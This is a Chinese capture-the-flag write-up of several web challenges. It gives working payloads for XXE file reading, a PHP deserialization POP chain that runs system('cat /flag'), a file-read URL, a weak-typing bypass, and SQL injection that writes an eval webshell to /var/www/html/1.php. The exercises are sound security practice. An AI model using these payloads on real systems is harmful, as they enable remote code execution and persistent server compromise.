Web

HNGK-xxx

1
xxe

描述:

1
xxx

image-20221029202221957

点登录发现没反应,看源码发现ajax

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<script type='text/javascript'>
        function doLogin() {
            var username = $("#username").val();
            var password = $("#password").val();
            if (username == "" || password == "") {
                alert("Please enter the username and password!");
                return;
            }

            var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
            $.ajax({
                type: "POST",
                url: "doLogin.php",
                contentType: "application/xml;charset=utf-8",
                data: data,
                dataType: "xml",
                anysc: false,
                success: function (result) {
                    var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
                    var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
                    if (code == "0") {
                        $(".msg").text(msg + " login fail!");
                    } else if (code == "1") {
                        $(".msg").text(msg + " login success!");
                    } else {
                        $(".msg").text("error:" + msg);
                    }
                },
                error: function (XMLHttpRequest, textStatus, errorThrown) {
                    $(".msg").text(errorThrown + ':' + textStatus);
                }
            });
        }
    </script>

构造请求包发现admin(即登录名)存在回显

payload:

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/flag" >]> 
<user>
	<username>&admin;</username>
	<password>xxe;</password>
</user>

image-20221029202019270

HNGK-DS_Store

1
pop链

描述:

1
首先你得明白,DS_store是个什么

存在DS_Store泄露

1
bXlwb3AucGhw

mypop.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
 <?php
highlight_file(__FILE__);


class Fish{
    public $food;
    public function __construct(){
        $this->food = array();
    }
    public function __get($value){
        $function = $this->food;
        return $function();
    }
}


class Bubble{
    public $bubble;
    protected $hack;
    public function __toString(){
        return $this->bubble;
    }
    public function run($value){
        @eval($value);
    }
    public function __invoke(){
        $this->run($this->hack);
    }
}

class Turtle{
    public $head;
    public $tail;
    public function __construct($tail="tail"){
        $this->tail = $tail;
        echo $tail;
    }
    public function __toString(){
        return $this->tail->head;
    }
}

class Stone{
    public $rock;
    public $ash;
    public function __construct($nice="wow"){
        $this->rock = $nice;
        echo "My rock --- ".$this->rock."<br>";
    }
    public function __destruct(){
        if(preg_match("/fish|bubble|gopher|http|file|ftp|https|dict|\.\./i", $this->rock)) {
            echo "no~no~no~";
        }
    }
    function __wakeup(){
        if ($this->rock != 'ash') {
            $this->rock = 'ash';
        }
    }
}


$data = @$_GET['data'];
if(isset($data)){
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$q);
    foreach($q as $v)
    {
        if(preg_match("/^O/i",$v))
        {
            die('***k hacker!!!');
            exit();
        }
    }
    unserialize($data);
}

?>

链子:

Stone::__wakeup–>Turtle::__toString–>Fish::__get()–>Bubble::__invoke()–>Bubble::__run()

parse_url用\\\绕过

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<?php
class Fish{
    public $food;
    // public function __construct(){
    //     $this->food = array();
    // }
    // public function __get($value){
    //     $function = $this->food;
    //     return $function();
    // }
}


class Bubble{
    public $bubble;
    protected $hack='system("cat /flag");';
    // public function __toString(){
    //     return $this->bubble;
    // }
    // public function run($value){
    //     @eval($value);
    // }
    // public function __invoke(){
    //     $this->run($this->hack);
    // }
}

class Turtle{
    public $head;
    public $tail;
    // public function __construct($tail="tail"){
    //     $this->tail = $tail;
    //     echo $tail;
    // }
    // public function __toString(){
    //     return $this->tail->head;
    // }
}

class Stone{
    public $rock;
    public $ash;
    // public function __construct($nice="wow"){
    //     $this->rock = $nice;
    //     echo "My rock --- ".$this->rock."<br>";
    // }
    // public function __destruct(){
    //     if(preg_match("/fish|bubble|gopher|http|file|ftp|https|dict|\.\./i", $this->rock)) {
    //         echo "no~no~no~";
    //     }
    // }
    // function __wakeup(){
    //     if ($this->rock != 'ash') {
    //         $this->rock = 'ash';
    //     }
    // }
}
$x=new Turtle();
$xx=new Fish();
$xxx=new Bubble();
$xxxx=new Stone();

$xx->food=$xxx;

$x->tail=$xx;

$xxxx->rock=$x;
echo serialize($xxxx);
echo "\n";
echo urlencode(serialize($xxxx));

payload:

1
///mypop.php?data=O%3A5%3A%22Stone%22%3A2%3A%7Bs%3A4%3A%22rock%22%3BO%3A6%3A%22Turtle%22%3A2%3A%7Bs%3A4%3A%22head%22%3BN%3Bs%3A4%3A%22tail%22%3BO%3A4%3A%22Fish%22%3A1%3A%7Bs%3A4%3A%22food%22%3BO%3A6%3A%22Bubble%22%3A2%3A%7Bs%3A6%3A%22bubble%22%3BN%3Bs%3A7%3A%22%00%2A%00hack%22%3Bs%3A20%3A%22system%28%22cat+%2Fflag%22%29%3B%22%3B%7D%7D%7Ds%3A3%3A%22ash%22%3BN%3B%7D

image-20221029201542413

HNGK-兰亭集序

任意读取

描述:

1
兰亭集序

开局先看URL

1
index.php?file=http://47.92.27.98:28046/poem.php

源码有个提示

1
<!-- 偷偷告诉你,flag在fflagggg.php中 -->

image-20221029202911704

直接读

1
index.php?file=fflagggg.php

image-20221029203007970

HNGK-phpgame

弱类型

描述:

1
有时候,乱码其实并不乱

浏览器修复一下文字编码即可看到明文

1
有时候,这种乱码其实并不乱,入口在这里: ΡΗΡ⒍⒍.ΡΗΡ

入口为php66.php

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
show_source(__FILE__);

$Step1=False;
$Step2=False;
$info=(array)json_decode(@$_GET['get']);
if(is_array($info)){
    is_numeric(@$info["year"])?die("Sorry~"):NULL;
    if(@$info["year"]){
        ($info["year"]=2022)?$Step1=True:NULL;
    }
    if(is_array(@$info["items"])){
        if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
        $status = array_search("game", $info["items"]);
        $status===false?die("Sorry~"):NULL;
        foreach($info["items"] as $key=>$val){
            $val==="game"?die("Sorry~"):NULL;
        }
        $Step2=True;
    }
}
if($Step1 && $Step2){
    echo getenv("FLAG");
}
?>

payload:

1
?get={"year":"x","items":[true,[1,2],"skiing2"]}

image-20221029204002629

HNGK-out

sql注入(联合查询)

描述:

1
一个简单的sql注入

image-20221029204232797

发现过滤了

1
select or 空格

payload示例:

1
?id=0'union/**/selselectect/**/1,2,group_concat(passwoorrd)/**/from/**/users ;%00

image-20221029204317989

双写绕过关键字,空格也可以双写绕过。

搜寻了一番,发现数据库没有flag,上马

1
0'union/**/selselectect/**/1,2,0x3c3f3d6576616c28245f504f53545b315d293b3f3e/**/into/**/outfile/**/'/var/www/html/1.php';%00

image-20221029204452558

虽然报错,但是小马已经写入了。

image-20221029204537963

image-20221029204600709